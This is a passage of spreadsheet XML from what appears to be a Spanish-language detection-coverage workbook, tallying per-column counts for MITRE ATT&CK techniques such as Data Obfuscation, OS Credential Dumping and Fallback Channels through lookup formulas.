      <formula>IF(N50&lt;M50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>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tabColor rgb="FFFFA7BA"/>
    <outlinePr summaryBelow="0" summaryRight="0"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:CT1086"/>
  <sheetViews>
    <sheetView zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <pane xSplit="2" ySplit="2" topLeftCell="C3" activePane="bottomRight" state="frozen"/>
      <selection activeCell="Q6" sqref="Q6"/>
      <selection pane="topRight" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomLeft" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomRight" activeCell="AC22" sqref="AC22"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="12.5703125" defaultRowHeight="15.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="4" style="4" customWidth="1"/>
    <col min="2" max="2" width="9.7109375" style="4" customWidth="1"/>
    <col min="3" max="3" width="21.140625" style="4" customWidth="1"/>
    <col min="4" max="4" width="9" style="6" hidden="1" customWidth="1"/>
    <col min="5" max="5" width="10.7109375" style="6" hidden="1" customWidth="1"/>
    <col min="6" max="6" width="13.5703125" style="4" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="7.5703125" style="4" customWidth="1"/>
    <col min="8" max="8" width="9.7109375" style="4" customWidth="1"/>
    <col min="9" max="9" width="13.7109375" style="4" customWidth="1"/>
    <col min="10" max="10" width="4.5703125" style="4" customWidth="1"/>
    <col min="11" max="11" width="8.5703125" style="4" customWidth="1"/>
    <col min="12" max="12" width="8" style="4" customWidth="1"/>
    <col min="13" max="14" width="7.5703125" style="4" customWidth="1"/>
    <col min="15" max="15" width="11.85546875" style="4" customWidth="1"/>
    <col min="16" max="16" width="4.5703125" style="4" customWidth="1"/>
    <col min="17" max="17" width="8.5703125" style="4" customWidth="1"/>
    <col min="18" max="18" width="9.7109375" style="4" customWidth="1"/>
    <col min="19" max="20" width="7.5703125" style="4" customWidth="1"/>
    <col min="21" max="21" width="14.85546875" style="4" customWidth="1"/>
    <col min="22" max="22" width="4.5703125" style="4" customWidth="1"/>
    <col min="23" max="24" width="8.5703125" style="4" customWidth="1"/>
    <col min="25" max="26" width="10.42578125" style="4" customWidth="1"/>
    <col min="27" max="27" width="15.5703125" style="4" customWidth="1"/>
    <col min="28" max="28" width="5.42578125" style="4" customWidth="1"/>
    <col min="29" max="29" width="8.5703125" style="4" customWidth="1"/>
    <col min="30" max="30" width="8.28515625" style="3" customWidth="1"/>
    <col min="31" max="32" width="7.5703125" style="4" customWidth="1"/>
    <col min="33" max="33" width="16.42578125" style="4" customWidth="1"/>
    <col min="34" max="34" width="4.5703125" style="4" customWidth="1"/>
    <col min="35" max="35" width="8.5703125" style="4" customWidth="1"/>
    <col min="36" max="36" width="9.7109375" style="4" customWidth="1"/>
    <col min="37" max="38" width="7.5703125" style="4" customWidth="1"/>
    <col min="39" max="39" width="15.85546875" style="4" customWidth="1"/>
    <col min="40" max="40" width="6.5703125" style="4" customWidth="1"/>
    <col min="41" max="41" width="8.5703125" style="4" customWidth="1"/>
    <col min="42" max="42" width="9.28515625" style="4" customWidth="1"/>
    <col min="43" max="43" width="7.5703125" style="4" customWidth="1"/>
    <col min="44" max="44" width="9.5703125" style="4" customWidth="1"/>
    <col min="45" max="45" width="7.5703125" style="4" customWidth="1"/>
    <col min="46" max="46" width="4.5703125" style="4" customWidth="1"/>
    <col min="47" max="47" width="8.5703125" style="4" customWidth="1"/>
    <col min="48" max="48" width="5.5703125" style="4" customWidth="1"/>
    <col min="49" max="49" width="7.5703125" style="4" customWidth="1"/>
    <col min="50" max="50" width="10.42578125" style="4" customWidth="1"/>
    <col min="51" max="51" width="11.28515625" style="4" customWidth="1"/>
    <col min="52" max="52" width="4.5703125" style="4" customWidth="1"/>
    <col min="53" max="53" width="8.5703125" style="4" customWidth="1"/>
    <col min="54" max="54" width="5.5703125" style="3" customWidth="1"/>
    <col min="55" max="55" width="7.5703125" style="4" customWidth="1"/>
    <col min="56" max="56" width="10" style="4" customWidth="1"/>
    <col min="57" max="57" width="12.7109375" style="4" customWidth="1"/>
    <col min="58" max="58" width="4.5703125" style="4" customWidth="1"/>
    <col min="59" max="59" width="8.5703125" style="4" customWidth="1"/>
    <col min="60" max="60" width="5.5703125" style="4" customWidth="1"/>
    <col min="61" max="61" width="7.5703125" style="1" customWidth="1"/>
    <col min="62" max="62" width="10" style="1" customWidth="1"/>
    <col min="63" max="63" width="12.28515625" style="1" customWidth="1"/>
    <col min="64" max="64" width="5.5703125" style="1" customWidth="1"/>
    <col min="65" max="65" width="8.5703125" style="1" customWidth="1"/>
    <col min="66" max="68" width="7.5703125" style="1" customWidth="1"/>
    <col min="69" max="69" width="12.42578125" style="1" customWidth="1"/>
    <col min="70" max="71" width="5.5703125" style="1" customWidth="1"/>
    <col min="72" max="72" width="7.85546875" style="1" customWidth="1"/>
    <col min="73" max="73" width="8.5703125" style="1" customWidth="1"/>
    <col min="74" max="74" width="7.5703125" style="1" customWidth="1"/>
    <col min="75" max="75" width="10.85546875" style="1" customWidth="1"/>
    <col min="76" max="76" width="10.7109375" style="1" customWidth="1"/>
    <col min="77" max="77" width="6.7109375" style="5" customWidth="1"/>
    <col min="78" max="78" width="8.5703125" style="5" customWidth="1"/>
    <col min="79" max="81" width="7.5703125" style="1" customWidth="1"/>
    <col min="82" max="82" width="17.42578125" style="1" customWidth="1"/>
    <col min="83" max="84" width="5.5703125" style="5" customWidth="1"/>
    <col min="85" max="86" width="8.5703125" style="5" customWidth="1"/>
    <col min="87" max="89" width="10.7109375" style="1" customWidth="1"/>
    <col min="90" max="90" width="14.42578125" style="1" customWidth="1"/>
    <col min="91" max="91" width="32.85546875" style="5" hidden="1" customWidth="1"/>
    <col min="92" max="93" width="42.42578125" style="5" hidden="1" customWidth="1"/>
    <col min="94" max="228" width="29.140625" style="1" customWidth="1"/>
    <col min="229" max="16384" width="12.5703125" style="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:93" ht="25.5" customHeight="1">
      <c r="A1" s="663" t="s">
        <v>177</v>
      </c>
      <c r="B1" s="663" t="s">
        <v>285</v>
      </c>
      <c r="C1" s="663" t="s">
        <v>294</v>
      </c>
      <c r="D1" s="663" t="s">
        <v>290</v>
      </c>
      <c r="E1" s="663" t="s">
        <v>291</v>
      </c>
      <c r="F1" s="668" t="s">
        <v>288</v>
      </c>
      <c r="G1" s="665" t="s">
        <v>2431</v>
      </c>
      <c r="H1" s="666"/>
      <c r="I1" s="666"/>
      <c r="J1" s="666"/>
      <c r="K1" s="666"/>
      <c r="L1" s="667"/>
      <c r="M1" s="665" t="s">
        <v>2323</v>
      </c>
      <c r="N1" s="666"/>
      <c r="O1" s="666"/>
      <c r="P1" s="666"/>
      <c r="Q1" s="666"/>
      <c r="R1" s="667"/>
      <c r="S1" s="665" t="s">
        <v>2324</v>
      </c>
      <c r="T1" s="666"/>
      <c r="U1" s="666"/>
      <c r="V1" s="666"/>
      <c r="W1" s="666"/>
      <c r="X1" s="667"/>
      <c r="Y1" s="665" t="s">
        <v>2325</v>
      </c>
      <c r="Z1" s="666"/>
      <c r="AA1" s="666"/>
      <c r="AB1" s="666"/>
      <c r="AC1" s="666"/>
      <c r="AD1" s="667"/>
      <c r="AE1" s="665" t="s">
        <v>2326</v>
      </c>
      <c r="AF1" s="666"/>
      <c r="AG1" s="666"/>
      <c r="AH1" s="666"/>
      <c r="AI1" s="666"/>
      <c r="AJ1" s="667"/>
      <c r="AK1" s="665" t="s">
        <v>2327</v>
      </c>
      <c r="AL1" s="666"/>
      <c r="AM1" s="666"/>
      <c r="AN1" s="666"/>
      <c r="AO1" s="666"/>
      <c r="AP1" s="667"/>
      <c r="AQ1" s="676" t="s">
        <v>1760</v>
      </c>
      <c r="AR1" s="677"/>
      <c r="AS1" s="677"/>
      <c r="AT1" s="666"/>
      <c r="AU1" s="666"/>
      <c r="AV1" s="667"/>
      <c r="AW1" s="665" t="s">
        <v>2328</v>
      </c>
      <c r="AX1" s="666"/>
      <c r="AY1" s="666"/>
      <c r="AZ1" s="666"/>
      <c r="BA1" s="666"/>
      <c r="BB1" s="667"/>
      <c r="BC1" s="665" t="s">
        <v>2329</v>
      </c>
      <c r="BD1" s="666"/>
      <c r="BE1" s="666"/>
      <c r="BF1" s="666"/>
      <c r="BG1" s="666"/>
      <c r="BH1" s="667"/>
      <c r="BI1" s="674" t="s">
        <v>2460</v>
      </c>
      <c r="BJ1" s="675"/>
      <c r="BK1" s="675"/>
      <c r="BL1" s="675"/>
      <c r="BM1" s="675"/>
      <c r="BN1" s="675"/>
      <c r="BO1" s="674" t="s">
        <v>2461</v>
      </c>
      <c r="BP1" s="675"/>
      <c r="BQ1" s="675"/>
      <c r="BR1" s="675"/>
      <c r="BS1" s="675"/>
      <c r="BT1" s="675"/>
      <c r="BU1" s="675"/>
      <c r="BV1" s="671" t="s">
        <v>2458</v>
      </c>
      <c r="BW1" s="672"/>
      <c r="BX1" s="672"/>
      <c r="BY1" s="672"/>
      <c r="BZ1" s="672"/>
      <c r="CA1" s="672"/>
      <c r="CB1" s="671" t="s">
        <v>2459</v>
      </c>
      <c r="CC1" s="672"/>
      <c r="CD1" s="672"/>
      <c r="CE1" s="672"/>
      <c r="CF1" s="672"/>
      <c r="CG1" s="672"/>
      <c r="CH1" s="673"/>
    </row>
    <row r="2" spans="1:93" s="3" customFormat="1" ht="52.5" customHeight="1">
      <c r="A2" s="664"/>
      <c r="B2" s="664"/>
      <c r="C2" s="664"/>
      <c r="D2" s="664"/>
      <c r="E2" s="664"/>
      <c r="F2" s="669"/>
      <c r="G2" s="288" t="s">
        <v>293</v>
      </c>
      <c r="H2" s="392" t="s">
        <v>4457</v>
      </c>
      <c r="I2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="J2" s="4" t="s">
        <v>725</v>
      </c>
      <c r="K2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="L2" s="585" t="s">
        <v>4131</v>
      </c>
      <c r="M2" s="291" t="s">
        <v>293</v>
      </c>
      <c r="N2" s="291" t="s">
        <v>4457</v>
      </c>
      <c r="O2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="P2" s="582" t="s">
        <v>725</v>
      </c>
      <c r="Q2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="R2" s="583" t="s">
        <v>4131</v>
      </c>
      <c r="S2" s="396" t="s">
        <v>293</v>
      </c>
      <c r="T2" s="291" t="s">
        <v>4457</v>
      </c>
      <c r="U2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="V2" s="582" t="s">
        <v>725</v>
      </c>
      <c r="W2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="X2" s="585" t="s">
        <v>4131</v>
      </c>
      <c r="Y2" s="392" t="s">
        <v>293</v>
      </c>
      <c r="Z2" s="392" t="s">
        <v>4457</v>
      </c>
      <c r="AA2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AB2" s="4" t="s">
        <v>725</v>
      </c>
      <c r="AC2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="AD2" s="583" t="s">
        <v>4131</v>
      </c>
      <c r="AE2" s="288" t="s">
        <v>293</v>
      </c>
      <c r="AF2" s="392" t="s">
        <v>4457</v>
      </c>
      <c r="AG2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AH2" s="4" t="s">
        <v>725</v>
      </c>
      <c r="AI2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="AJ2" s="585" t="s">
        <v>4131</v>
      </c>
      <c r="AK2" s="291" t="s">
        <v>293</v>
      </c>
      <c r="AL2" s="291" t="s">
        <v>4457</v>
      </c>
      <c r="AM2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AN2" s="582" t="s">
        <v>725</v>
      </c>
      <c r="AO2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="AP2" s="583" t="s">
        <v>4131</v>
      </c>
      <c r="AQ2" s="396" t="s">
        <v>293</v>
      </c>
      <c r="AR2" s="291" t="s">
        <v>4457</v>
      </c>
      <c r="AS2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AT2" s="582" t="s">
        <v>725</v>
      </c>
      <c r="AU2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="AV2" s="585" t="s">
        <v>4131</v>
      </c>
      <c r="AW2" s="392" t="s">
        <v>293</v>
      </c>
      <c r="AX2" s="392" t="s">
        <v>4457</v>
      </c>
      <c r="AY2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="AZ2" s="4" t="s">
        <v>725</v>
      </c>
      <c r="BA2" s="4" t="s">
        <v>2487</v>
      </c>
      <c r="BB2" s="583" t="s">
        <v>4131</v>
      </c>
      <c r="BC2" s="511" t="s">
        <v>293</v>
      </c>
      <c r="BD2" s="512" t="s">
        <v>4457</v>
      </c>
      <c r="BE2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BF2" s="584" t="s">
        <v>725</v>
      </c>
      <c r="BG2" s="493" t="s">
        <v>2487</v>
      </c>
      <c r="BH2" s="513" t="s">
        <v>4131</v>
      </c>
      <c r="BI2" s="339" t="s">
        <v>293</v>
      </c>
      <c r="BJ2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="BK2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BL2" s="324" t="s">
        <v>2252</v>
      </c>
      <c r="BM2" s="325" t="s">
        <v>2488</v>
      </c>
      <c r="BN2" s="336" t="s">
        <v>4132</v>
      </c>
      <c r="BO2" s="339" t="s">
        <v>293</v>
      </c>
      <c r="BP2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="BQ2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BR2" s="324" t="s">
        <v>2252</v>
      </c>
      <c r="BS2" s="337" t="s">
        <v>730</v>
      </c>
      <c r="BT2" s="325" t="s">
        <v>2487</v>
      </c>
      <c r="BU2" s="397" t="s">
        <v>4131</v>
      </c>
      <c r="BV2" s="338" t="s">
        <v>293</v>
      </c>
      <c r="BW2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="BX2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BY2" s="324" t="s">
        <v>2253</v>
      </c>
      <c r="BZ2" s="324" t="s">
        <v>2489</v>
      </c>
      <c r="CA2" s="336" t="s">
        <v>4133</v>
      </c>
      <c r="CB2" s="404" t="s">
        <v>293</v>
      </c>
      <c r="CC2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="CD2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="CE2" s="324" t="s">
        <v>2253</v>
      </c>
      <c r="CF2" s="337" t="s">
        <v>730</v>
      </c>
      <c r="CG2" s="325" t="s">
        <v>2487</v>
      </c>
      <c r="CH2" s="397" t="s">
        <v>4131</v>
      </c>
    </row>
    <row r="3" spans="1:93" s="8" customFormat="1" ht="15" customHeight="1">
      <c r="A3" s="4">
        <v>1</v>
      </c>
      <c r="B3" s="4" t="str">
        <f>IFERROR(VLOOKUP(A3,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1001</v>
      </c>
      <c r="C3" s="493" t="str">
        <f>IFERROR(VLOOKUP(B3,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Obfuscation</v>
      </c>
      <c r="D3" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B3)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E3" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F3" s="286" t="str">
        <f>D3&amp;" ("&amp;E3&amp;")"</f>
        <v>2 (2)</v>
      </c>
      <c r="G3" s="292">
        <v>9</v>
      </c>
      <c r="H3" s="322">
        <v>6</v>
      </c>
      <c r="I3" s="322">
        <v>0</v>
      </c>
      <c r="J3" s="12">
        <v>6</v>
      </c>
      <c r="K3" s="13">
        <v>1</v>
      </c>
      <c r="L3" s="394">
        <v>2</v>
      </c>
      <c r="M3" s="322">
        <v>0</v>
      </c>
      <c r="N3" s="322">
        <v>0</v>
      </c>
      <c r="O3" s="322">
        <v>0</v>
      </c>
      <c r="P3" s="12">
        <v>0</v>
      </c>
      <c r="Q3" s="13">
        <v>0</v>
      </c>
      <c r="R3" s="394">
        <v>0</v>
      </c>
      <c r="S3" s="292">
        <v>9</v>
      </c>
      <c r="T3" s="322">
        <v>6</v>
      </c>
      <c r="U3" s="322">
        <v>0</v>
      </c>
      <c r="V3" s="12">
        <v>6</v>
      </c>
      <c r="W3" s="13">
        <v>1</v>
      </c>
      <c r="X3" s="394">
        <v>2</v>
      </c>
      <c r="Y3" s="392">
        <v>9</v>
      </c>
      <c r="Z3" s="392">
        <v>6</v>
      </c>
      <c r="AA3" s="322">
        <v>0</v>
      </c>
      <c r="AB3" s="392">
        <v>6</v>
      </c>
      <c r="AC3" s="16">
        <v>1</v>
      </c>
      <c r="AD3" s="394">
        <v>2</v>
      </c>
      <c r="AE3" s="392">
        <v>8</v>
      </c>
      <c r="AF3" s="392">
        <v>4</v>
      </c>
      <c r="AG3" s="322">
        <v>0</v>
      </c>
      <c r="AH3" s="392">
        <v>2</v>
      </c>
      <c r="AI3" s="16">
        <v>1</v>
      </c>
      <c r="AJ3" s="394">
        <v>2</v>
      </c>
      <c r="AK3" s="392">
        <v>17</v>
      </c>
      <c r="AL3" s="392">
        <v>10</v>
      </c>
      <c r="AM3" s="322">
        <v>0</v>
      </c>
      <c r="AN3" s="392">
        <v>8</v>
      </c>
      <c r="AO3" s="16">
        <v>1</v>
      </c>
      <c r="AP3" s="394">
        <v>2</v>
      </c>
      <c r="AQ3" s="292">
        <v>0</v>
      </c>
      <c r="AR3" s="322">
        <v>0</v>
      </c>
      <c r="AS3" s="322">
        <v>0</v>
      </c>
      <c r="AT3" s="12">
        <v>0</v>
      </c>
      <c r="AU3" s="13">
        <v>0</v>
      </c>
      <c r="AV3" s="394">
        <v>0</v>
      </c>
      <c r="AW3" s="392">
        <v>0</v>
      </c>
      <c r="AX3" s="392">
        <v>0</v>
      </c>
      <c r="AY3" s="322">
        <v>0</v>
      </c>
      <c r="AZ3" s="4">
        <v>0</v>
      </c>
      <c r="BA3" s="16">
        <v>0</v>
      </c>
      <c r="BB3" s="394">
        <v>0</v>
      </c>
      <c r="BC3" s="292">
        <v>9</v>
      </c>
      <c r="BD3" s="322">
        <v>6</v>
      </c>
      <c r="BE3" s="322">
        <v>0</v>
      </c>
      <c r="BF3" s="12">
        <v>6</v>
      </c>
      <c r="BG3" s="13">
        <v>1</v>
      </c>
      <c r="BH3" s="394">
        <v>2</v>
      </c>
      <c r="BI3" s="292">
        <v>1</v>
      </c>
      <c r="BJ3" s="322">
        <v>1</v>
      </c>
      <c r="BK3" s="322">
        <v>0</v>
      </c>
      <c r="BL3" s="12">
        <v>1</v>
      </c>
      <c r="BM3" s="13">
        <v>0.5</v>
      </c>
      <c r="BN3" s="394">
        <v>1</v>
      </c>
      <c r="BO3" s="292">
        <v>3</v>
      </c>
      <c r="BP3" s="322">
        <v>3</v>
      </c>
      <c r="BQ3" s="322">
        <v>0</v>
      </c>
      <c r="BR3" s="12">
        <v>1</v>
      </c>
      <c r="BS3" s="12">
        <v>2</v>
      </c>
      <c r="BT3" s="13">
        <v>1</v>
      </c>
      <c r="BU3" s="394">
        <v>2</v>
      </c>
      <c r="BV3" s="292">
        <v>0</v>
      </c>
      <c r="BW3" s="322">
        <v>0</v>
      </c>
      <c r="BX3" s="322">
        <v>0</v>
      </c>
      <c r="BY3" s="12">
        <v>0</v>
      </c>
      <c r="BZ3" s="13">
        <v>0</v>
      </c>
      <c r="CA3" s="394">
        <v>0</v>
      </c>
      <c r="CB3" s="292">
        <v>3</v>
      </c>
      <c r="CC3" s="322">
        <v>2</v>
      </c>
      <c r="CD3" s="322">
        <v>0</v>
      </c>
      <c r="CE3" s="12">
        <v>0</v>
      </c>
      <c r="CF3" s="12">
        <v>2</v>
      </c>
      <c r="CG3" s="13">
        <v>1</v>
      </c>
      <c r="CH3" s="394">
        <v>2</v>
      </c>
      <c r="CM3" s="9"/>
      <c r="CN3" s="9"/>
      <c r="CO3" s="9"/>
    </row>
    <row r="4" spans="1:93" ht="15" customHeight="1">
      <c r="A4" s="4">
        <f>A3+1</f>
        <v>2</v>
      </c>
      <c r="B4" s="4" t="str">
        <f>IFERROR(VLOOKUP(A4,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1003</v>
      </c>
      <c r="C4" s="493" t="str">
        <f>IFERROR(VLOOKUP(B4,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>OS Credential Dumping</v>
      </c>
      <c r="D4" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B4)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E4" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F4" s="579" t="str">
        <f>D4&amp;" ("&amp;E4&amp;")"</f>
        <v>1 (3)</v>
      </c>
      <c r="G4" s="292">
        <v>3</v>
      </c>
      <c r="H4" s="322">
        <v>2</v>
      </c>
      <c r="I4" s="322">
        <v>0</v>
      </c>
      <c r="J4" s="12">
        <v>2</v>
      </c>
      <c r="K4" s="13">
        <v>1</v>
      </c>
      <c r="L4" s="394">
        <v>1</v>
      </c>
      <c r="M4" s="322">
        <v>0</v>
      </c>
      <c r="N4" s="322">
        <v>0</v>
      </c>
      <c r="O4" s="322">
        <v>0</v>
      </c>
      <c r="P4" s="12">
        <v>0</v>
      </c>
      <c r="Q4" s="13">
        <v>0</v>
      </c>
      <c r="R4" s="394">
        <v>0</v>
      </c>
      <c r="S4" s="292">
        <v>3</v>
      </c>
      <c r="T4" s="322">
        <v>2</v>
      </c>
      <c r="U4" s="322">
        <v>0</v>
      </c>
      <c r="V4" s="12">
        <v>2</v>
      </c>
      <c r="W4" s="13">
        <v>1</v>
      </c>
      <c r="X4" s="394">
        <v>1</v>
      </c>
      <c r="Y4" s="392">
        <v>4</v>
      </c>
      <c r="Z4" s="392">
        <v>3</v>
      </c>
      <c r="AA4" s="322">
        <v>0</v>
      </c>
      <c r="AB4" s="392">
        <v>3</v>
      </c>
      <c r="AC4" s="16">
        <v>1</v>
      </c>
      <c r="AD4" s="394">
        <v>2</v>
      </c>
      <c r="AE4" s="392">
        <v>4</v>
      </c>
      <c r="AF4" s="392">
        <v>2</v>
      </c>
      <c r="AG4" s="322">
        <v>0</v>
      </c>
      <c r="AH4" s="392">
        <v>2</v>
      </c>
      <c r="AI4" s="16">
        <v>1</v>
      </c>
      <c r="AJ4" s="394">
        <v>1</v>
      </c>
      <c r="AK4" s="392">
        <v>8</v>
      </c>
      <c r="AL4" s="392">
        <v>5</v>
      </c>
      <c r="AM4" s="322">
        <v>0</v>
      </c>
      <c r="AN4" s="392">
        <v>5</v>
      </c>
      <c r="AO4" s="16">
        <v>1</v>
      </c>
      <c r="AP4" s="394">
        <v>3</v>
      </c>
      <c r="AQ4" s="292">
        <v>0</v>
      </c>
      <c r="AR4" s="322">
        <v>0</v>
      </c>
      <c r="AS4" s="322">
        <v>0</v>
      </c>
      <c r="AT4" s="12">
        <v>0</v>
      </c>
      <c r="AU4" s="13">
        <v>0</v>
      </c>
      <c r="AV4" s="394">
        <v>0</v>
      </c>
      <c r="AW4" s="392">
        <v>0</v>
      </c>
      <c r="AX4" s="392">
        <v>0</v>
      </c>
      <c r="AY4" s="322">
        <v>0</v>
      </c>
      <c r="AZ4" s="4">
        <v>0</v>
      </c>
      <c r="BA4" s="16">
        <v>0</v>
      </c>
      <c r="BB4" s="394">
        <v>0</v>
      </c>
      <c r="BC4" s="292">
        <v>3</v>
      </c>
      <c r="BD4" s="322">
        <v>2</v>
      </c>
      <c r="BE4" s="322">
        <v>0</v>
      </c>
      <c r="BF4" s="12">
        <v>2</v>
      </c>
      <c r="BG4" s="13">
        <v>1</v>
      </c>
      <c r="BH4" s="394">
        <v>1</v>
      </c>
      <c r="BI4" s="292">
        <v>0</v>
      </c>
      <c r="BJ4" s="322">
        <v>0</v>
      </c>
      <c r="BK4" s="322">
        <v>0</v>
      </c>
      <c r="BL4" s="12">
        <v>0</v>
      </c>
      <c r="BM4" s="13">
        <v>0</v>
      </c>
      <c r="BN4" s="394">
        <v>0</v>
      </c>
      <c r="BO4" s="292">
        <v>3</v>
      </c>
      <c r="BP4" s="322">
        <v>3</v>
      </c>
      <c r="BQ4" s="322">
        <v>0</v>
      </c>
      <c r="BR4" s="12">
        <v>0</v>
      </c>
      <c r="BS4" s="12">
        <v>3</v>
      </c>
      <c r="BT4" s="13">
        <v>1</v>
      </c>
      <c r="BU4" s="394">
        <v>3</v>
      </c>
      <c r="BV4" s="292">
        <v>0</v>
      </c>
      <c r="BW4" s="322">
        <v>0</v>
      </c>
      <c r="BX4" s="322">
        <v>0</v>
      </c>
      <c r="BY4" s="12">
        <v>0</v>
      </c>
      <c r="BZ4" s="13">
        <v>0</v>
      </c>
      <c r="CA4" s="394">
        <v>0</v>
      </c>
      <c r="CB4" s="292">
        <v>0</v>
      </c>
      <c r="CC4" s="322">
        <v>0</v>
      </c>
      <c r="CD4" s="322">
        <v>0</v>
      </c>
      <c r="CE4" s="12">
        <v>0</v>
      </c>
      <c r="CF4" s="12">
        <v>0</v>
      </c>
      <c r="CG4" s="13">
        <v>0</v>
      </c>
      <c r="CH4" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:93" ht="15" customHeight="1">
      <c r="A5" s="4">
        <f t="shared" ref="A5:A68" si="0">A4+1</f>
        <v>3</v>
      </c>
      <c r="B5" s="4" t="str">
        <f>IFERROR(VLOOKUP(A5,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1008</v>
      </c>
      <c r="C5" s="493" t="str">
        <f>IFERROR(VLOOKUP(B5,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Fallback Channels</v>
      </c>
      <c r="D5" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B5)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E5" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>6</v>
      </c>
      <c r="F5" s="579" t="str">
        <f t="shared" ref="F5:F68" si="1">D5&amp;" ("&amp;E5&amp;")"</f>
        <v>1 (6)</v>
      </c>
      <c r="G5" s="292">
        <v>15</v>
      </c>
      <c r="H5" s="322">
        <v>1</v>
      </c>
      <c r="I5" s="322">
        <v>0</v>
      </c>
      <c r="J5" s="12">
        <v>1</v>
      </c>
      <c r="K5" s="13">
        <v>1</v>
      </c>
      <c r="L5" s="394">
        <v>1</v>
      </c>
      <c r="M5" s="322">
        <v>17</v>
      </c>
      <c r="N5" s="322">
        <v>7</v>
      </c>
      <c r="O5" s="322">
        <v>0</v>
      </c>
      <c r="P5" s="12">
        <v>4</v>
      </c>
      <c r="Q5" s="13">
        <v>1</v>
      </c>
      <c r="R5" s="394">
        <v>3</v>
      </c>
      <c r="S5" s="292">
        <v>32</v>
      </c>
      <c r="T5" s="322">
        <v>8</v>
      </c>
      <c r="U5" s="322">
        <v>0</v>
      </c>
      <c r="V5" s="12">
        <v>5</v>
      </c>
      <c r="W5" s="13">
        <v>1</v>
      </c>
      <c r="X5" s="394">
        <v>3</v>
      </c>
      <c r="Y5" s="392">
        <v>99</v>
      </c>
      <c r="Z5" s="392">
        <v>4</v>
      </c>
      <c r="AA5" s="322">
        <v>0</v>
      </c>
      <c r="AB5" s="392">
        <v>3</v>
      </c>
      <c r="AC5" s="16">
        <v>1</v>
      </c>
      <c r="AD5" s="394">
        <v>3</v>
      </c>
      <c r="AE5" s="392">
        <v>57</v>
      </c>
      <c r="AF5" s="392">
        <v>28</v>
      </c>
      <c r="AG5" s="322">
        <v>0</v>
      </c>
      <c r="AH5" s="392">
        <v>22</v>
      </c>
      <c r="AI5" s="16">
        <v>1</v>
      </c>
      <c r="AJ5" s="394">
        <v>5</v>
      </c>
      <c r="AK5" s="392">
        <v>156</v>
      </c>
      <c r="AL5" s="392">
        <v>32</v>
      </c>
      <c r="AM5" s="322">
        <v>0</v>
      </c>
      <c r="AN5" s="392">
        <v>25</v>
      </c>
      <c r="AO5" s="16">
        <v>1</v>
      </c>
      <c r="AP5" s="394">
        <v>5</v>
      </c>
      <c r="AQ5" s="292">
        <v>0</v>
      </c>
      <c r="AR5" s="322">
        <v>0</v>
      </c>
      <c r="AS5" s="322">
        <v>0</v>
      </c>
      <c r="AT5" s="12">
        <v>0</v>
      </c>
      <c r="AU5" s="13">
        <v>0</v>
      </c>
      <c r="AV5" s="394">
        <v>0</v>
      </c>
      <c r="AW5" s="392">
        <v>0</v>
      </c>
      <c r="AX5" s="392">
        <v>0</v>
      </c>
